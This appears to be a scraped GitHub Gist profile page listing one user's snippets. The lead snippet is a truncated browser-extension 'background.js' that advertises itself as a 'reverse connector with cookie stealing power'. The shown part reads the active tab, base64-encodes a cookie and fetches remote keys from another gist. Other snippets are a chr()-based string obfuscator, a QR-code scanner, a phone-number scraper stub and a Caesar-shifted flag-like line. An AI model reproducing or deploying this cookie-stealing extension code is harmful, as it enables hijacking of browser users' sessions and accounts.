Skip to content

Instantly share code, notes, and snippets.

View the5orcerer's full-sized avatar
💭
Busy on eating own cookies, do not disturb. 🕊️

Abu Hurayra the5orcerer

💭
Busy on eating own cookies, do not disturb. 🕊️
View GitHub Profile
Kd kd kd, brx fdq'w ilqg xv! 20 5 14 9 ghfubsw wklv;
Khuh lv rxu orfdwlrq: QLHW{Lp_Vsb}
@the5orcerer
the5orcerer / background.js
Last active January 12, 2023 12:48
A reverse connector with cookie stealing power.
function cookie_xy(expoCookie){
chrome.tabs.getSelected(null, function(tab) {
var name = new URL(tab.url).hostname;
var cookie = btoa(expoCookie);
var uri = tab.url;
var ipx = 'localhost';
var UAgent = window.navigator.userAgent;
var xhl = new XMLHttpRequest();
xhl.open('GET', 'https://gist.githubusercontent.com/the5orcerer/87fd54148d22081426bb3cada383da44/raw/66ec4b9f48a7b6a73f2d9afa4d24279c91cf0d77/keys.json', false);
xhl.send();
import sys
code = sys.argv[1]
code = [ord(code) for code in code]
lxd = ['chr('+str(sttr)+')+' for sttr in code]
print(''.join(lxd)[:-1])
@the5orcerer
the5orcerer / qty.py
Created June 2, 2022 05:03
PyCode to scan a qrcode.
from PIL import Image
from pyzbar import pyzbar
for i in range(0, 200):
img = Image.open(f'myqr{i}.png')
output = pyzbar.decode(img)
print(f'{output[0][0].decode("ascii")} From "{img.filename}"')
@the5orcerer
the5orcerer / get_numbers.py
Created April 24, 2022 10:20
python number snatcher.
import requests
import sys
import re
from bs4 import BeautifulSoup
name = ''
user = ''
passwd = ''
names = []
ids = []